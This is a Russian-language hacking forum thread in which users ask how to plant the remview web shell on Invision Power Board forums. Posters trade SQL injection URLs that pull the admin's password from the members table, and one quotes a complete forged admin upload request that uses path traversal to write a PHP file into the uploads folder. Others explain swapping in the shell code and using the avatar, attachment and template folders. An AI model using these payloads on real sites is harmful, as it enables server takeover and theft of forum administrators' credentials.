Вопрос про заливку шелла в Invision Power Board

как залить remview в Invision Power Board? Я прочитал статью как можно через смайлики но нифига не понял. Что можно сделать? Как можно по другому получить доступ?

 

Ну объясните кто нибудь.

 

ДА блин проверки нет, кидаеш туды файл вместо смайла и все.

 

А где можно феньку со смайлами найти? Чегото я немогу обнаружить.... :\

И вот я пытал ipb 1.3 final но чтото бесполезно =\

http://[target]/forum/index.php?act=Search&nav=lv&CODE=show&searchid=[my_id]&search_in=topics&result_type=topics&hl=&st=20SELECT password FROM ibf_members WHERE name='mega_admin'/*

и вот ещё

http://[target]/index.php?showforum=1&prune_day=100&sort_by=Z-A&sort_key=SELECT password FROM ibf_members WHERE name='maga_admin'

вот ёлки палки ничего неполучилось... =\
Пытался залить shell в аватары but can't

 

Не качается через смайлы я уже пробовал. Папка походу на запись закрыта.

 

Мля ну другую папку найди...например с аватарами! Про это же несколько статей есть на античате!!!

 

Хехехе вы вместо [my_id] и других подставьте значения конкретные )))
Эта SQL injection работает только в 2.x
Шелл залить либо через присоединенный файл, либо через смайлы либо через
темплейты

 

нет ну значения то конкретные на форуме были)))
Вот как с смайлами что то непонятно
Смайлы и аватары wget'ом тоже?

 

Вот подделанный запрос из статьи

Code:

POST http://someSiteForum/admin.php?adsess=7456d367b18da87d161f59424a4e96f7 HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://someSiteForum/admin.php?adsess=7456d367b18da87d161f59424a4e96f7&act=op&code=emo
Accept-Language: ru
Content-Type: multipart/form-data; boundary=---------------------------7d43942c405bc
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 677
Pragma: no-cache
Cookie: member_id=1; pass_hash=cf20fc37b4g0be45c1336f29d444e798;

-----------------------------7d43942c405bc
Content-Disposition: form-data; name="adsess"

7456d367b18da87d161f59424a4e96f7
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="code"

emo_upload
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="act"

op
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000000
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="FILE_UPLOAD"; filename="[COLOR=red]../../uploads/myFile.php[/COLOR]"
Content-Type: application/octet-stream

<% echo("Hello from injected PHP script") %>
-----------------------------7d43942c405bc--

Где на моем компе должен лежать remview?
../../uploads/myFile.php
Я прочитал статью но нихрена не получается.

 

Неее, лутше просто залить через смайлы - если папка закрыта то неполучится...
Но тольок при чем тут wget?

 

В статье то написано что remview должен залиться в папку uploads которая всегда доступна на запись.

 

Ну почему всегда?
Не всегда - иногда админы специально ее Chmodят )))
но чаще всего открыта

 

Ну так как это сделать?

 

Algol помоги Plz. Ты же статью написал.

 

../../uploads/myFile.php - это относительный путь к файлу, который будет создан на сервере!

А сам текст пхп-скрипта нужно вставлять вместо этого:
<% echo("Hello from injected PHP script") %>

Эхххх... учите HTTP...